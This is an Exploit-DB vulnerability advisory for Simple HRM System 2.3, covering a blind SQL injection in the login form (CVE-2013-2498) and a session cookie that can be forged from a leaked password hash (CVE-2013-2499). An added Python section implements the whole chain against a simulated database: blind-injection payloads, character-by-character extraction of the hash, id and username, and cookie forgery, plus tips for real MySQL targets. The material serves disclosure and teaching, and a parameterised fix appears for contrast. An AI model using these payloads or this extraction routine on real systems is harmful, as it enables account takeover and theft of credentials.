Simple HRM System 2.3 – Multiple Vulnerabilities

  • Author: Doraemon
    Date: 2013-04-12
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/24954/
  • # Exploit Title: Multiple Vulnerabilities in Simple HRM system v2.3 and
    below
    # Date: 12/04/2013
    # Exploit Author: Doraemon
    # Vendor Homepage: http://www.simplehrm.com/
    # Software Link: http://sourceforge.net/projects/simplehrm/
    # Version: 2.2/2.3
    # Tested on: 2.2 & 2.3
    # CVE : CVE-2013-2498, CVE-2013-2499
    
    Date Discovered: 07 March 2013
    
    Vendor notified: 12 March 2013 (no response from the vendor after one month)
    
    Advisory posted: 12 April 2013
    
    *CVE-2013-2498*
    
    Simple HRM System is vulnerable to SQL injection in its login page.
    
    An attacker can perform blind SQL injection through the login form and
    obtain information such as password hashes.
    
    *Attack URL:* http://localhost/simplehrm/index.php/user/setLogin
    *Method:* POST
    *Vuln Parameter:* username=(SQL INJECTION)&password=abcdef
    *Vuln Type:* unsanitised input argument ($name, the submitted username)
    *Vuln File:* simlehrm/flexycms/modules/user/user_manager.php
    *Line:* 84
    $res_company = getsingleindexrow('CALL
    get_search_sql("'.TABLE_PREFIX.'company","email_id = \''.$name.'\' AND
    isactive = 1 LIMIT 1")');
    
    $name is concatenated straight into the WHERE clause that is handed to the
    get_search_sql stored procedure, so a single quote in the username closes
    the string literal and the rest of the input is evaluated as SQL. The
    application only reveals whether the lookup found a row, which is enough
    for a boolean-based blind extraction.
    
    *CVE-2013-2499*
    
    We discovered that if an attacker gets hold of a user's password hash, the
    attacker can easily forge the session cookie and impersonate anyone on the
    system. Combined with the blind SQL injection above, an attacker can
    blindly extract the password hash, user id and username and recreate the
    cookie.
    
    *Vuln File:* simlehrm/flexycms/modules/user/user_manager.php
    *Line:* 215
    $v_user_password =
    md5($info['id_user'].$info['username'].$info['password']);
    
    Every input to the cookie is a column read from the database, and
    $info['password'] is the stored hash rather than the cleartext password, so
    knowing the hash is as good as knowing the password. This vuln effectively
    defeats one of the primary purposes of password hashing.
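The two findings above chain into a single attack: the line 84 injection leaks the three values that line 215 hashes, and the hash alone is enough to mint a cookie. The following Python is an added example written for this page; it is not the advisory's code nor Simple HRM's. It simulates the database with SQLite rather than MySQL and assumes that get_search_sql(table, where) expands to a plain SELECT over the supplied WHERE clause, that passwords are stored as MD5 hex, and that id_user, username, email_id, password and isactive all sit on one table (the advisory does not show the schema; the column names are taken from the two vulnerable lines). The hardened lookup with a bound parameter is included for contrast.

```python
import hashlib
import sqlite3
import string

# Constructed stand-in for the target's account record. The column names are
# an assumption taken from the two vulnerable lines: email_id/isactive from the
# WHERE clause on line 84, id_user/username/password from the cookie on line 215.
TABLE_PREFIX = "hrm_"
STORED_HASH = hashlib.md5(b"hunter2").hexdigest()  # assumed: md5 password storage

conn = sqlite3.connect(":memory:")
conn.execute(
    f"CREATE TABLE {TABLE_PREFIX}company "
    "(id_user INTEGER, username TEXT, email_id TEXT, password TEXT, isactive INTEGER)"
)
conn.execute(
    f"INSERT INTO {TABLE_PREFIX}company VALUES (?, ?, ?, ?, ?)",
    (7, "admin", "admin@example.com", STORED_HASH, 1),
)


def build_where(name: str) -> str:
    """Same string concatenation as line 84: $name lands unescaped in the clause."""
    return "email_id = '" + name + "' AND isactive = 1 LIMIT 1"


def vulnerable_lookup(name: str) -> bool:
    """Assumed expansion of CALL get_search_sql(table, where): a plain SELECT.

    Returns True when the LIMIT 1 row exists. Whether the login step finds a
    row is the only thing the attacker observes, hence 'blind'."""
    sql = f"SELECT * FROM {TABLE_PREFIX}company WHERE " + build_where(name)
    return conn.execute(sql).fetchone() is not None


def safe_lookup(name: str) -> bool:
    """Hardened form: the username travels as a bound parameter, so a quote in
    it is data, not syntax. The WHERE clause can then no longer be handed to a
    stored procedure as one pre-built string."""
    sql = f"SELECT * FROM {TABLE_PREFIX}company WHERE email_id = ? AND isactive = 1 LIMIT 1"
    return conn.execute(sql, (name,)).fetchone() is not None


# Single quote excluded: it would close the literal early and break the payload.
CHARSET = string.ascii_letters + string.digits + string.punctuation.replace("'", "")


def leak_column(column: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction of one column of the LIMIT 1 row.

    Payload: x' OR SUBSTR(col, i, 1) = 'c
    After line 84's concatenation the clause reads
      email_id = 'x' OR SUBSTR(col, i, 1) = 'c' AND isactive = 1 LIMIT 1
    AND binds tighter than OR, so the row comes back exactly when the guess
    is right. (On MySQL compare with BINARY to avoid case-insensitive matches.)"""
    length = next(
        n for n in range(max_len + 1)
        if vulnerable_lookup(f"x' OR LENGTH({column}) = {n} AND '1' = '1")
    )
    leaked = ""
    for i in range(1, length + 1):
        leaked += next(
            c for c in CHARSET
            if vulnerable_lookup(f"x' OR SUBSTR({column}, {i}, 1) = '{c}")
        )
    return leaked


def forge_cookie(id_user: str, username: str, password_hash: str) -> str:
    """Line 215 verbatim: md5($info['id_user'].$info['username'].$info['password']).
    Every input is a database column and 'password' is already the stored hash,
    so the hash is password-equivalent."""
    return hashlib.md5((id_user + username + password_hash).encode()).hexdigest()


def forge_session() -> str:
    """Full chain: leak the three cookie ingredients, then mint the cookie."""
    return forge_cookie(leak_column("id_user"), leak_column("username"), leak_column("password"))


if __name__ == "__main__":
    print("leaked hash:", leak_column("password"))
    print("forged cookie:", forge_session())
    print("same payload against the parameterised query:", safe_lookup("x' OR '1' = '1"))
```

Each character costs one login request, so the 32-character hash plus id and username leak in a few thousand POSTs; a real target would also need the MySQL BINARY comparison noted in the comment, since MySQL's default collation would otherwise accept both cases of each hex letter. The forged value is then sent in place of the legitimate cookie; no password ever has to be cracked.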
    
    
    Regards
    
    Doraemon